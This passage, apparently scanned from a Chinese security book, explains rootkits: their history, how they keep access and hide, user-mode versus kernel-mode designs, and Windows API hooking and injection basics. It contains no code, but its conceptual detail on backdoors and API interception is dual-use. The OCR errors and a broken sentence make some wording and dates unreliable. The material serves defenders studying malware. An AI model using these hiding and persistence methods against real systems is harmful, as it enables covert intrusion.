代码 保存 在 非 易 失 的 位 置 上 ， 如 文件 系统 或 者 注册 表 。 基 于 内 存 的 Rootkit 纯 粹 在 内 存 中 运行 ， 在 系统 启动 后 丢失 ， 这 在 运行 中 
的 系统 上 更 加 难以 发 现 。 


3.1.1 时间 轴 


Rootkit 随 着 时 间 的 推移 而 发 展 。 从 一 组 帮助 维持 对 一 台 机 器 的 访问 权 的 工具 集 开 始 ， 它 们 已 经 演变 成 了 绰 恶 的 应 用 程序 ， 
能 够 隐藏 自身 和 其 他 文件 ， 难 以 删除 并 且 帮 助 其 他 恶意 软件 。 下 面 是 一 个 简单 的 时 间 轴 ， 帮 助 你 了 解 Rootkit 的 演变 : 


- 20 世 纪 80 年 代 未 ”发现 第 一 个 日 志清 除 程 序 。 

1994 年 ”发 现 第 一 个 SunOS Rootkit。 

. 1996 年 ”第 一 个 Linux Rootkit 出 现 。 

- 1997 年 《Phrack》 杂 志 中 提 到 了 基于 可 装 入 内 核 模块 的 Rootkit。 

. 1998 年 Silvio Cesare 发 布 第 一 个 非 可 装 入 内 核 模 块 的 内 核 补丁 Rootkit 代 码 。 全 功能 的 Windows 后 门 Back Orifice 发 布 。 


. 1999F Greg Hoglund 发 布 第 一 种 Windows Rootkit 





NT Rootkit。 
2000 年 ”tOrnkit libproc Rootkit/ 特洛伊 木马 发 布 。 
- 2002 年 、Rootkit 中 出 现 Sniffer 后 门 。Hacker Defender 发 布 ， 成 为 最 常 使 用 的 Windows Rootkit 之 一 。 


- 2004 年 ”Unix 中 的 大 多 数 Rootkit 开 发 停止 ， 焦 点 转移 到 Windows。EU Rootkit 发 布 并 引入 一 种 新 的 隐藏 进程 的 技术 。 


. 2005 年 ”Sony BMG 发 生 Rootkit 恬 闻 。 第 一 次 将 Rootkit 技 术 用 于 商业 。 
- 2006 年 “Rootkit 成 为 几乎 每 个 主要 的 蠕虫 和 病毒 的 一 部 分 。 开 始 开发 虚拟 Rootkit。 
2008 年 ”在 没有 新 技术 出 现 的 两 年 之 后 ，Rootkit 开 始 利用 自 举 进程 自行 安装 ， 代 码 改 编 自 eEye Bootroot Rootkit. 


. 2010 年 ”根据 报告 ，Aluteon 具 有 通过 入 侵 系 统 主 引导 记录 (MBR) ， 绕 过 Windows764 位 版 本 强制 内 核 模 式 程序 签名 要 求 


- 2011 年 ”Webroot 报 告 了 第 一 种 BIOS Rootkit 





Mebromi. 

- 2011 年 ”发 现 ZeroAccess Rootkit. 

2012 年 ”臭名 昭著 的 ZeroAccess Rootkit 提 出 新 变种 ， 利 用 用 户 模式 Rootkit 技 术 。 

- 2013 Avatar Rootkit 样 本 被 发 现 ， 它 能 绕 过 主机 入 侵 预 防 系统 (HIPS) 的 检测 。 

-2015F Hacking Team Rootkit 出 现 。 它 使 用 统一 可 扩展 固件 接口 (UEFI) 基本 输入 /输出 系统 (BIOS) Rootkit， 使 其 远 


程控 制 系统 代理 程序 可 以 潜藏 于 系统 中 ， 即 使 在 新 硬盘 上 安装 新 操作 系统 也 不 会 被 删除 。 


3.1.2 “Rootkit 的 主要 特征 


Rootkit 技 术 设计 用 于 提升 计算 机 系统 上 的 特权 。 这 种 提升 为 攻击 者 提供 了 两 种 对 目标 攻击 很 有 帮助 的 功能 : 
- 维持 访问 权 
通过 隐身 掩盖 存在 


Rootkit 的 第 一 个 重要 特征 是 维持 访问 权 ， 维 持 对 被 破解 的 系统 的 访问 权 对 于 攻击 者 来 说 是 很 重要 的 。 具 备 了 重新 以 完整 的 
管理 权限 登录 到 服务 器 上 的 能 力 ， 攻 击 者 就 能 利用 服务 器 来 进行 其 他 攻击 、 人 存储 数据 或 者 寄生 一 个 恶意 的 网 站 。Rootkit 通 过 安 
装 本 地 或 者 远程 后 门 来 维持 访问 权 。 本 地 后 门 是 一 个 应 用 程序 ， 运 行 后 将 会 给 予 普 通用 户 完全 的 管理 权限 。 本 地 后 门 在 早期 
Rootkit 开 发 中 很 常见 ， 因 为 许多 系统 的 攻击 者 是 试图 提升 权限 的 普通 用 户 。 而 且 ， 攻 击 者 希望 保留 一 个 本 地 后 门 作为 本 地 后 门 
用 户 账户 的 补充 ， 以 防 远程 后 门 失效 。 


远程 后 门 一 般 是 最 佳 的 方法 。 早 期 的 Rootkit 具 有 多 种 远程 后 门 。Rootkit 中 后 门 的 隐蔽 性 和 成 熟 程度 是 区 分 各 种 Rootkit 的 
标准 。 远 程 后 门 一 般 分 为 3 种 : 网 络 套 接 字 监 听 程 序 、 特 洛 伊 木马 或 者 隐蔽 信道 。 


基于 网 络 的 后 门 


多 年 以 来 Rootkit 使 用 了 多 种 基于 网 络 的 后 门 ， 有 些 现在 仍然 被 广泛 使 用 。 标 准 的 基于 网 络 的 后 门 是 在 系统 的 高 端口 上 使 用 
telnet 或 者 运行 一 个 shell 程 序 。 例 如 ， 攻 击 者 修改 inetd， 这 样 在 用 户 连 接 到 31337 端 口 时 会 打开 一 个 命令 shell。 这 种 后 门 可 以 
追溯 到 20 世 纪 80 年 代 ， 在 20 世 纪 90 年 代 也 使 用 过 。 攻 击 者 使 用 了 TCP、UDP 甚 至 ICMP， 但 是 UDP 和 ICMP 可 靠 性 差 得 多 ， 一 般 
不 能 很 好 地 工作 。 后 门 使 用 的 通信 流 一 般 是 普通 文本 ， 但 是 较 晚 的 版 本 开始 使 用 加 密 ， 以 便 在 所 连接 的 机 器 或 者 网 络 上 放置 了 嗅 
探 程序 时 可 以 隐藏 通信 。 


这 些 基于 网 络 的 后 门 的 问题 是 ， 很 容易 被 所 在 系统 上 的 端口 扫描 或 者 使 用 一 个 阻止 除了 接受 服务 的 真正 客户 之 外 所 有 入 站 端 
口 的 防火 墙 发 现 。 这 些 后 门 很 少 进行 身份 认证 或 者 用 户 登录 验证 ， 所 以 有 些 攻击 者 扫描 互联 网 寻找 他 们 能 简单 访问 的 后 门 ， 并 且 
从 其 他 攻击 者 那里 接管 这 个 后 门 。 


作为 大 部 分 攻击 者 的 最 后 手段 ， 另 一 种 基于 网 络 的 Rootkit 完 全 不 在 网 络 上 运行 ， 但 是 可 以 通过 被 破解 的 系统 的 Web 服 务 器 
访问 。 这 些 公共 网 天 接口 (CG) 脚本 将 被 安装 在 Web 服 务 器 的 一 个 目录 上 ， 并 且 执 行 用 户 定义 的 命令 ， 在 浏览 器 中 显示 输出 。 
本 地 后 门 可 以 用 于 与 这 个 脚本 一 起 重新 得 到 机 器 的 控制 权 ， 以 防 管理 员 删 除 账户 或 者 基于 网 络 的 后 门 应 用 程序 。 


时 光 流 转 ， 我 们 进入 了 21 世 纪 ，Windows 成 为 Rootkit 开 发 者 的 主要 焦点 ， 攻 击 者 开始 利用 Back Orifice 这 样 的 后 门 来 保持 
对 Windows 设 备 的 远程 访问 权 。Back Orifice 发 布 于 1999 年 未 ， 为 攻击 者 提供 了 对 Windows 设 备 的 远程 访问 ，2000 年 末 发 布 的 
改进 版 本 提供 了 插件 架构 ， 这 些 插件 使 攻击 者 能 够 远程 地 看 到 运行 Back Orifice 的 机 器 的 屏幕 、 键 盘 输入 ， 并 且 可 以 安装 软件 ， 
查看 存储 的 密码 ， 运 行 任何 程序 。Back Orifice 主 要 使 用 TCP 作 为 通信 协议 ， 而 且 可 以 配置 。Back Orifice 发 布 后 ， 它 所 提供 的 
功能 被 采用 并 且 集 成 到 许多 其 他 Windows 环 境 的 恶意 软件 和 Rootkit 中 。 


隐身 : 掩盖 存在 


Rootkit 的 第 二 种 主要 特性 是 可 以 隐藏 它们 在 系统 上 存在 的 任何 证 据 。 我 们 已 经 提 到 过 ，Rootkit 从 攻击 者 用 于 删除 他 们 所 闻 
入 的 系统 上 的 日 志 的 程序 演变 而 来 。 由 于 Rootkit 开 始 转变 为 提供 对 系统 持续 的 “ 根 ”访问 权 的 程序 ， 因 此 Rootkit 运 作 所 必需 的 
所 有 文件 或 者 注册 表 键 值 就 变 得 非常 重要 了 。 如 果 隐 藏 了 本 书 提 到 的 这 些 项 目 ， 系 统管 理 员 和 防 Rootkit 工 具 将 非常 难以 发 现 
Rootkit。 大 部 分 Rootkit 将 会 隐藏 它们 所 生成 的 文件 、Rootkit 用 户 指定 的 文件 以 及 Rootkit 所 生成 的 所 有 网 络 连 接 。 所 要 隐藏 的 
内 容 通常 在 一 个 配置 文件 中 指定 或 者 硬 编码 于 Rootkit 自 身 之 上 。 


最 新 一 代 的 Rootkit 使 用 其 隐身 能 力 帮助 其 他 恶意 软件 (如 窃取 用 户 名 、 密 码 和 银行 账户 信息 的 程序 ) 躲避 用 户 和 防 恶 意 软 
件 工具 。 恶 意 软 件 和 Rootkit 的 结盟 促使 Rootkit 开 发 者 显著 地 改进 了 隐身 技术 的 质量 和 有 效 性 。 当 Rootkit 在 Unix 环 境 中 第 一 次 
被 发 现时 ， 它 们 一 般 只 能 使 用 一 种 方法 来 实现 自己 的 隐身 能 力 。 例 如 ， 它 们 在 ls 工具 使 用 时 过 滤 文 件 ， 但 是 当 一 个 定制 工具 从 文 
件 系统 读 取 文 件 时 就 无 法 过 滤 。 最 新 的 Windows Rootkit (例如 Rustock.C) 所 使 用 的 Rootkit， 能 够 使 用 多 种 方法 确保 没有 遗 
漏 。 这 些 方法 将 在 第 4 章 和 第 10 章 中 讨论 。 


隐身 是 所 有 Rootkit 的 主要 部 件 ， 本 书 将 用 大 量 的 篇 幅 对 Rootkit 开 发 者 用 于 实现 其 隐身 能 力 的 概念 和 技术 加 以 阐述 。 为 什么 
隐身 对 于 我 们 来 说 这 么 重要 ? 这 只 是 因为 大 部 分 Rootkit 检 测 工 具 利 用 隐身 功能 对 系统 的 改变 来 发 现 Rootkit! 


3.1.3 ”Rootkit 的 类 型 


Rootkit 一 般 有 两 种 类 型 : 用 户 模式 和 内 核 模式 。 用 户 模式 Rootkit 运 行 于 系统 上 一 个 用 户 的 环境 和 安全 上 下 文中 。 例 如 ， 如 
果 你 以 用 户 cmedina 登 录 工 作 站 ， 这 个 用 户 没有 管理 特权 ， 那 么 Rootkit 将 进行 过 滤 ， 将 后 门 访问 权 赋 予 所 有 cmedina 账 户 下 运 
行 的 应 用 程序 。 一 般 来 说， 大 部 分 用 户 账户 也 拥有 管理 特权 ， 所 以 用 户 模式 的 Rootkit 也 能 够 防止 系统 级 别 的 进程 (如 Windows 
服务 ) 受到 隐身 功能 的 影响 。 


尽管 本 书 主要 关注 Windows 恶 意 软 件 和 Rootkit， 但 在 Unix 界 也 有 一 种 类 型 的 Rootkit 和 用 户 模式 的 Rootkit 很 相似 ， 这 种 
Rootkit 常 常 被 称 为 程序 库 Rootkit， 它 们 过 滤 应 用 程序 对 各 种 共享 系统 库 的 调用 。 因 为 这 种 Rootkit 没 有 直接 与 具体 的 用 户 名 关 
联 ， 所 以 可 能 比 标准 的 用 户 模 式 Rootkit 更 高 效 ， 但 是 不 像 内 核 模 式 Rootkit 那 么 高 效 或 者 难以 删除 。 


内 核 模式 Rootkit 在 操作 系统 内 部 与 硬件 (如 显示 卡 、 网 卡 或 者 鼠标 ) 驱动 程序 的 相同 级 别 中 运行 。 编 写 一 个 用 于 操作 系统 
内 核 中 的 Rootkit 要 比 用 户 模式 Rootkit 难 得 多 ， 需 要 攻击 者 具备 很 高 的 技巧 。 而 且 ， 由 于 大 部 分 操作 系统 因为 更 新 和 新 的 版 本 而 
改变 内 核 的 一 些 部 分 ， 所 以 内 核 Rootkit 不 能 工作 于 所 有 版 本 的 Windows。 因 为 Rootkit 的 运作 像 驱动 程序 一 样 在 内 核 进行 ， 所 
以 它 就 具备 了 增加 操作 系统 不 稳定 性 的 能 力 。 通 常 ， 这 是 大 部 分 人 发 现 系统 上 运行 着 Rootkit 的 原因 ， 因 为 他 们 注意 到 系统 速度 
减 慢 、 出 现 蓝屏 或 者 导致 系统 重新 启动 的 其 他 错误 。 


有 些 内 核 Rootkit 还 跳 过 API 调 用 ， 直 接 跳 转 到 API 调 用 时 执行 的 代码 。 当 代码 在 系统 更 新 后 被 移动 时 ， 直 接 跳 转 会 表现 出 不 


本 书后 面 几 章 将 讨论 多 种 Rootkit， 包 括 内 核 模式 、 虚 拟 、 数 据 库 和 硬件 Rootkit， 但 是 在 本 章 中 我 们 将 集中 讨论 用 户 模式 
Rootkit。 


3.2 用户 模式 Rootkit 
本 章 的 余下 部 分 将 讨论 几 种 类 型 的 用 户 模式 Rootkit， 定 义 、 解 释 功 能 ， 然 后 提供 不 同 Rootkit 的 实例 和 对 策 。 


3.2.1 ”什么 是 用 户 模式 Rootkit 


在 本 章 的 开头 ， 我 们 已 经 建立 了 Rootkit 的 通用 定义 ， 可 以 进一步 定义 来 包含 更 多 的 Rootkit 类 型 。 我 们 将 用 户 模式 的 
Rootkit 定 义 为 “能 够 长 时 间 存 在 于 计算 机 上 或 者 自动 化 信息 系统 上 的 未 被 发 现 的 处 于 用 户 空间 (userland) 的 用 户 程序 和 代码 
集合 ”。 从 本 书 的 意图 出 发 ， 用 户 空 间 的 定义 为 “不 属于 内 核 并 由 特权 分 离 (privilege separation) 保护 的 应 用 程序 空间 ”。 
实际 上 ， 所 有 用 户 模式 应 用 程序 在 用 户 账户 特权 级 别 上 运行 于 系统 之 中 ， 不 是 操作 系统 的 一 部 分 。 例 如 ， 如 果 你 以 cmedina 用 
户 身份 登录 Windows 工 作 站 ， 用 户 模式 Rootkit 将 以 用 户 cmedina 的 身份 进行 操作 。 所 有 权限 和 策略 (如 拒绝 策略 或 者 权限 ) 仍 
然 有 效 ， 这 将 会 限制 Rootkit 所 能 访问 的 对 象 。 尽 管用 户 一 般 被 视 为 最 低 权限 并 且 对 文件 和 目录 的 访问 权 受 到 削减 ， 但 是 在 当今 
的 家 庭 和 公司 环境 中 大 部 分 工作 站 的 用 户 以 本 地 工作 站 的 管理 用 户 身份 运行 。 作 为 本 地 工作 站 的 管理 用 户 ， 用 户 Rootkit 得 到 了 
本 地 工作 站 上 的 完全 控制 权 。 


为 了 便于 解释 ， 本 章 中 讨论 的 用 户 模式 Rootkit 都 是 Windows Rootkit。 尽 管 *nix 和 Windows 系 统 中 的 功能 性 极其 相似 ， 但 
是 在 过 去 的 10 年 中 Windows Rootkit 的 变种 分 布 要 广 得 多 。 尽 管用 户 模式 Rootkit 的 开发 无 论坛 么 说 都 不 简单 ， 但 是 对 于 
Windows 平 台 来 说 比 *nix 要 更 容易 创建 和 散布 。 


操作 系统 的 流行 性 、 可 用 的 免费 源 代码 数量 以 及 官方 支持 的 钧 子 机 制 文档 的 数量 使 得 Windows 中 的 用 户 模 式 Rootkit 的 开发 
变 得 简单 。 这 有 多 简单 ? 可 是 ， 即 使 开发 这 么 容易 ， 攻 击 者 仍然 觉得 下 载 源 代码 和 编译 所 需要 的 时 间 和 精力 大多， 因此 通用 而 高 
效 的 用 户 模式 Rootkit 一 一 Hacker Defender 可 以 人 花费 大 约 500 美 元 购买 到 。 如 果 你 希望 定制 自己 的 Rootkit，Hacker Defender 
和 其 他 用 户 模式 的 Rootkit 源 代码 可 以 公开 下 载 。 开 放 源 代码 的 Rootkit 已 经 变 得 更 加 普遍 ， 所 以 没有 经 验 的 攻击 者 就 更 加 容易 上 
手 了 。 


从 建立 一 个 用 户 模 式 Rootkit 到 在 Windows 上 部 署 之 间 的 时 间 很 短 ， 这 推动 了 恶意 软件 的 散布 ， 这 些 恶 意 软件 要 求 用 户 模 式 
Rootkit 将 它们 隐藏 起 来 ， 在 Windows 任 务 管理 器 、 注 册 表 和 文件 系统 中 难以 友 现 。 用 户 模 式 Rootkit 被 广泛 采用 并 且 开 始 成 为 
普遍 现象 ， 因 此 安全 界 采 用 了 相应 的 技术 来 探测 它们 。 现 在 ， 用 户 模式 Rootkit 不 是 非常 肥效， 相对 容易 被 大 部 分 防 病毒 产品 发 
现 。 我 们 甚至 认为 用 户 模 式 Rootkit 是 没有 用 的 ， 但 是 许多 恶意 软件 仍然 采用 用 户 模 式 Rootkit 技 术 ， 因 此 理解 Rootkit 方 法 以 便 
寺 续 地 发 现 和 分 析 它 们 是 很 重要 的 。 


3.2.2 后台 技术 


因为 Rootkit 依 赖 于 隐身 状态 的 实现 ， 所 以 它 必 须 在 用 户 模式 中 拦截 和 枚 举 应 用 编程 接口 (API) ， 并 且 从 任何 返回 的 结果 
中 删除 Rootkit。API 钩 子 必须 以 不 可 探测 的 方式 实现 ， 以 免 通 知 用 户 或 者 管理 员 Rootkit 的 人 存在。 因为 API 钩 子 对 于 理解 用 户 模 
式 Rootkit 的 工作 方式 很 关键 ， 所 以 我 们 将 花 一 点 时 间 谈 谈 关 于 它 的 内 容 以 及 用 于 与 API 挂 钩 的 技术 。 


现在 ， 有 几 种 方法 能 够 实现 刚才 所 提 到 的 钩 子 ， 其 中 一 些 方法 得 到 Microsoft 的 支持 ， 而 其 他 方法 则 不 被 支持 。 这 一 点 很 重 
要 ， 因 为 这 意味 着 Rootkit 的 意图 取决 于 Rootkit 的 作者 ， 可 以 是 你 的 员工 安装 的 像 击 键 记录 程序 那样 的 系统 监控 、 盗 窃 程 序 或 者 
其 他 软件 。Sony BMG 在 2005 年 组 合 到 CD 中 的 Rootkit 是 一 个 骇人听闻 的 实例 。Sony CD 在 用 户 播放 时 会 在 计算 机 上 安装 扩展 
版 权 保护 (Extended Copyright Protection, XCP) 和 MediaMax-3 软 件 。 这 个 Rootkit 在 安全 研究 人 员 Mark Russinovich F 
syslnternals 测 试 RootkitReyealer 的 新 版 本 时 发 现 。 尽 管 这 是 一 个 旧 的 实例 ， 但 是 XCP 说 明了 隐藏 和 保持 不 被 发 现 对 于 合法 的 目 
的 的 重要 性 ， 以 及 Rootkit 的 恶意 性 完全 源 于 创作 者 的 意图 的 原因 。XCP Rootkit 设 计 用 来 隐藏 所 有 文件 、 注 册 表 项 以 及 以 
$sys$ 开 始 的 进程 。 这 么 做 的 意图 是 Sony 的 DRM 解 决 方案 利用 Rootkit 所 创建 的 隐藏 能 力 来 确保 DRM 不 会 从 机 器 上 删除 掉 ， 如 果 
用 户 试图 获取 DRM CD 上 的 信息 ，CD 是 无 法 使 用 的 ; 但 是 ， 任 何 应 用 程序 包括 恶意 软件 可 以 利用 这 个 功能 ， 只 需 将 文件 名 加 上 
$sys$ 前 缀 。Sony 的 实例 是 商业 机 构 选 择 使 用 Rootkit 来 达到 一 个 有 争议 的 “好 ”意图 ， 但 是 他 们 实现 这 一 意图 的 手段 不 正确 。 
当然 ， 其 他 恶意 的 Rootkit 作 者 可 以 使 用 与 XCP 应 用 程序 相同 的 技术 实现 大 不 相同 的 意图 。 


注意 : 关于 Rootkit 的 使 用 、 效 果 和 意图 已 经 争论 了 多 年 ， 我 们 在 本 书 的 这 个 部 分 不 再 参与 这 一 争论 。 我 们 的 目标 是 提供 关于 
Rootkit 功 能 ` 实例 和 对 策 的 信 息 ° 


在 进入 复杂 的 话题 之 前 ， 我 们 将 回顾 一 些 对 理解 Rootkit 功 能 的 背景 很 重要 的 计算 、 编 程 和 操作 系统 结构 概念 。 这 些 
Windows 资 源 、 程 序 库 和 组 件 是 Rootkit 功 能 所 针对 的 主题 ， 用 来 隐藏 、 掩 盖 或 者 以 其 他 方式 隐藏 系统 活动 。 


进程 和 线程 


WEE (process) 是 计算 机 系统 中 执行 的 程序 的 一 个 实例 ， 而 线程 (thread) 是 执行 单独 指令 的 子 进程 (从 进程 中 产生 ) , 
一 般 是 并 行 执行 的 。 例 如 ， 在 一 个 系统 上 执行 一 个 Rootkit< process> 可 能 同时 产生 多 个 线程 。 进 程 和 线程 之 间 的 不 同 很 关键 ， 
因为 几乎 每 种 主要 的 用 户 模 式 Rootkit 技 术 都 处 理 线程 而 不 是 进程 。 


体系 结构 层次 


在 x86 计 算 机 系统 体系 结构 中 ， 具 有 授予 特权 与 抵御 系统 错误 和 未 授权 访问 的 多 个 保护 层次 。 这 种 环 状 的 系统 提供 了 特定 的 
访问 级 别 ， 这 些 级 别 一 般 通过 CPU 模式 来 实现 。 这 些 环 (ring) 是 层次 化 的 ， 从 具有 最 高 访问 级 别 的 Ring0 开 始 到 最 低级 别 的 
Ring3。 在 大 部 分 操作 系统 中 ，Ring0 保 留 给 内 存 和 CPU 功能 ， 比 如 内 核 操作 。 在 Windows OS 中 支持 两 个 环 Ring0 和 Ring3， 这 
对 于 Rootkit 的 功能 很 重要 。 在 Ring0 中 运行 的 线程 处 于 核心 模式 ， 可 以 猜 到 Ring3 中 运行 的 线程 是 用 户 模式 的 。 我 们 将 在 讨论 内 
核 模式 Rootkit 时 更 详细 地 讲述 保护 层次 ， 这 里 要 记 住 一 点 : OS 代码 在 Ring0 中 运行 ， 应 用 程序 代码 在 Ring3 中 运行 。 


系统 调用 


用 户 模式 应 用 程序 通过 执行 系统 调用 (system call) 来 与 内 核 接口 ， 系 统 调用 是 从 操作 系统 提供 的 动态 链接 库 (Dynamic 
Link Libraries, DLL) 中 输出 的 特定 函数 。 当 应 用 程序 进行 系统 调用 时 ， 确 定 的 系统 调用 的 执行 通过 一 系列 预先 确定 的 函数 调用 
路 由 到 内 核 。 这 意味 着 系统 调用 A 运行 时 ， 消 数 调 用 X、Y 和 Zz 的 执行 始终 保持 同样 的 顺序 。Rootkit 冰 数 将 采用 这 些 标准 的 操作 系 
统 调用 来 运行 。 在 下 面 的 例子 中 ， 我 们 将 指出 几 个 Rootkit 大 显 身手 的 地 方 ， 它 们 在 这 里 劫持 或 者 挂钩 (hook) 预先 确定 的 系统 
调用 路 径 ， 并 在 这 些 路 径 上 添加 新 的 功能 。 


例如 ， 如 果 一 个 用 户 模式 的 应 用 程序 希望 列 出 C 驱 动 器 上 一 个 目录 中 的 所 有 文件 ， 这 个 应 用 程序 将 会 调用 Windows 函 数 
FindFirstFile () ， 该 函数 从 kernel32.DLL 输 出 。 为 了 调整 系统 调用 路 径 ， 用 户 模式 Rootkit 将 寻找 kernel32.DLL 中 的 这 个 函 
数 ， 并 且 在 该 函数 被 调用 时 修改 它 ， 执 行 Rootkit 代 码 ， 以 替代 传统 上 在 kernel32.DLL 中 找到 的 代码 ，Rootkit 简 单 地 调用 
kernel32.DLL 中 的 真实 代码 ， 并 且 在 结果 返回 给 应 用 程序 之 前 进行 过 滤 。 


在 提高 操作 系统 稳定 性 的 努力 中 ，Microsoft 在 每 个 进程 中 采用 了 虚拟 地 址 ， 这 样 每 个 用 户 应 用 程序 不 会 干扰 其 他 用 户 执行 
的 其 他 应 用 程序 。 因 此 ， 当 应 用 程序 请 求 访问 特定 的 内 存 地 址 时 ， 操 作 系统 拦截 这 个 调用 并 且 可 能 拒绝 对 该 内 人 存 地 址 的 访问 。 但 
是 ， 因 为 每 个 Windows 用 户 模式 应 用 程序 运行 于 自己 的 虚拟 内 存 空间 中 ，Rootkit 必 须 挂 钧 和 调整 每 个 运行 在 系统 上 的 应 用 程序 
的 内 存 空 间 中 的 系统 调用 路 径 ， 以 确保 所 有 结果 被 正确 过 滤 。 此 外 ，Rootkit 必 须 在 新 的 应 用 程序 装 入 时 得 到 通知 ， 这 样 它 也 能 
拦截 该 应 用 程序 的 系统 调用 。 这 种 技术 与 内 核 模式 钩子 技术 不 同 ， 内 核 模 式 钩子 不 需要 持续 拦截 系统 调用 。 具 体 地 说， 内 核 模式 
Rootkit 可 以 挂钩 和 拦截 单个 内 核 系统 调用 ， 然 后 所 有 的 用 户 模 式 调用 都 将 被 拦截 。 


动态 链接 库 


动态 链接 库 (DLL， 扩 展 名 为 .dll) 是 Microsoft Windows 操 作 系统 中 的 共享 程序 库 。 所 有 Windows DLL 编码 为 可 移植 执行 
体 (Portable Executable, PE) 格式 ， 这 和 可 执行 程序 文件 (exe) 格式 相同 。 这 些 程序 库 在 程序 执行 时 装 入 应 用 程序 中 ， 并 
且 保 留 在 预先 确定 的 文件 位 置 上 。 每 个 DLL 可 以 动态 或 者 静态 地 映射 到 应 用 程序 的 内 存 空间 ， 所 以 应 用 程序 可 以 在 不 访问 磁盘 上 
的 DLL 的 情况 下 访问 DLL 的 函数 。 在 动态 映射 的 情况 下 ，DLL 的 函数 在 执行 时 由 应 用 程序 装 入 。 动 态 链接 库 的 一 个 重要 好 处 是 可 
以 更 新 以 修复 缺陷 或 者 安全 问题 ， 使 用 它们 的 应 用 程序 能 够 立刻 访问 修复 后 的 代码 。 当 DLL 动态 地 编译 到 应 用 程序 中 时 ， 来 自 
DLL 的 函数 被 复制 到 应 用 程序 的 二 进 制 代 码 中 。 这 使 程序 员 可 以 在 编译 的 时 候 连 接 程序 库 ， 不 需要 相同 的 程序 库 或 者 插件 的 多 余 
拷贝 。 


有 必要 注意 一 个 特殊 的 DLL: Kernel32.dll， 这 是 一 个 处 理 输入 /和 输出、 中断 和 内 存 管理 的 用 户 模式 程序 。 之 所 以 要 专门 谈 到 
这 个 DLL， 是 因为 许多 人 认为 这 个 DLL 是 存在 于 内 核 。 事 实 上 它 不 存在 于 内 核 ， 而 是 在 用 户 空间 中 与 User32.dll 协 同 工 作 。 


API 函 数 


Windows 操 作 系统 中 采用 的 应 用 编程 接口 (API) 是 用 来 与 所 有 编程 语言 直接 通信 的 ， 有 8 种 控制 Windows 操 作 系 统 所 有 系 
统 访问 权 的 类 别 。 表 3-1 描 述 了 这 些 WinAPI 类 别 、 相 互 之 间 的 关系 和 位 置 。 


表 3-1 Windows API 分 类 


WinAPI 类 别 WinAPI 描述 
高 级 服务 高 级 服务 提供 对 内 核 中 重要 资源 (如 注册 R 和 Windows 服 务 ) 的 访问 。 这 种 功能 对 
Rootkit 来 说 很 关键 ， 因 为 钩子 使 Rootkit 能 启动 /停止 服务 、 重 新 启动 和 修改 注册 表 键 值 
这 些 服 务 是 OS 中 的 设备 、 文 件 系统 、 进 程 和 线程 。 它 们 存在 于 16 位 Windows 操作 
基本 服务 系统 的 kernel.exe 和 krnl386.exe， 以 及 32 位 和 64 位 Windows 操作 系统 的 kernel32.dll 和 
advapi32.dll 中 。 第 4 章 将 深入 研究 内 核 和 这 些 API 函数 
通用 控件 库 这 个 程序 库 为 应 用 程序 提供 控件 ， 如 菜单 栏 、 工 具 栏 和 进度 条 。32 位 和 64 位 
Windows 操作 系统 中 通用 控件 库 位 于 comctl32.dll 中 
通用 对 话 框 库 通用 对 ia 为 应 用 程序 提供 标准 对 话 框 的 共享 程序 库 ， 用 于 保存 、 查 找 和 打开 文件 
等 任务 。 这 个 程序 库 包 含 在 comdlg32.dll 中 
图 形 设备 接口 这 个 接口 为 监视 器 、 打印 机 和 其 他 类 型 的 外 设 输出 设备 提供 函数 。 在 32 位 和 64 位 
Windows 操作 系统 中 该 接口 位 于 gdi32.dll 文件 中 
网 络 服务 网 络 服务 细 分 为 两 个 类 别 : 一 个 用 于 有 线 网 络 ， 男 一 个 用 于 无 线 网 络 。 这 些 服务 包括 


Windows 用 于 网 络 通信 的 NetBIOS, RPC 和 Windows Socket API (Winsock) 
Windows 中 的 用 户 界 面 设 计 用 于 管理 和 使 用 基本 控件 ， 并 且 接 收 用 户 输入 (鼠标 、 键 
用 户 界 面 盘 等 )。16 位 版 本 位 于 userexe 中 ，32 位 版 本 位 于 user32.dll 中 。 但 是 ，Microsoft 已 经 将 
用 户 界 面 连同 其 他 通用 控件 移 到 comctl32.dll 程序 库 中 


WinAPI 类 别 WinAPI 描述 
虽然 这 是 用 户 界 面 (UT) 的 一 部 分 ， 但 是 这 个 API 提供 对 操作 系统 外 这 的 访问 (和 修 


Windows 外 壳 (shell) ae ents 
g 改 )。Windows 外 壳 位 于 32 位 系统 的 shlwapi.dll 中 





在 64 位 Windows 系 统 中 ， 为 了 保持 兼容 性 ，DLL 仍 使 用 *32 的 名 称 。 例 如 ，kernel32.dll 在 64 位 系统 中 没有 被 改名 为 
kernel64.dll; 尽管 使 用 64 位 二 进 制 编码 ， 但 仍然 叫 作 kernel32.dll。 你 还 将 注意 到 ， 在 64 位 Windows 中 有 两 个 组 : system32 和 
syswow64。system32 包 含 64 位 二 进 制 码 ， 而 syswow64 包 含 32 位 二 进 制 码 。syswow 指 的 是 “Windows on Windows64" , 
运行 于 用 户 模式 ， 将 Windows 内 核 的 32 位 调用 映射 到 等 价 的 64 位 调用 。 是 不 是 有 点 乱 ? 


关于 16 ~ 64 位 应 用 程序 的 Windows API 要 素 ， 可 在 Microsoft 开 发 网 (MSDN, msdn.microsoft.com) 上 找到 。 每 个 API 
都 很 重要 ， 因 为 它们 都 具有 Rootkit 运 作 所 需要 挂钩 、 绕 过 或 者 修改 的 函数 。 更 具有 恶意 性 和 高 效率 的 Rootkit 将 会 确保 拦截 每 种 
服务 类 中 的 函数 ; 否则 ， 防 Rootkit 工 具 可 能 确定 Rootkit 的 存在 。 


3.2.3 ”注入 技术 


本 小 节 阐述 一 些 用 户 模式 Rootkit 所 采用 的 更 复杂 的 函数 和 技术 的 基础 知识 。 任 何 用 户 模式 Rootkit 的 第 一 个 步骤 都 是 将 其 代 
码 注入 希望 安装 钩子 的 进程 中 。 现 在 ， 我 们 来 回顾 一 下 当今 使 用 的 注入 技术 。 我 们 只 关注 基础 知识 ， 因 为 在 过 去 的 几 年 中 ， 在 应 
用 程序 中 采用 用 户 模式 钩子 技术 的 复杂 性 已 经 大 大 增强 ， 这 使 得 我 们 无 法 给 出 完美 的 钩子 实例 。 改 进 的 防 病毒 软件 、64 位 操作 
系统 以 及 托管 代码 (managed code， 在 虚拟 机 下 运行 的 代码 ) 意味 着 每 种 注入 和 钧 子 技术 各 有 长 短 ， 一 种 技术 本 身 不 是 百 分 
之 百 有 效 的 。 


在 Rootkit 挂 钩 一 个 函数 以 及 在 进程 中 转移 一 个 函数 的 执行 路 径 时 ， 必 须 将 本 身 放 在 希望 挂钩 的 进程 中 。 这 通常 要 求 DLL 注 
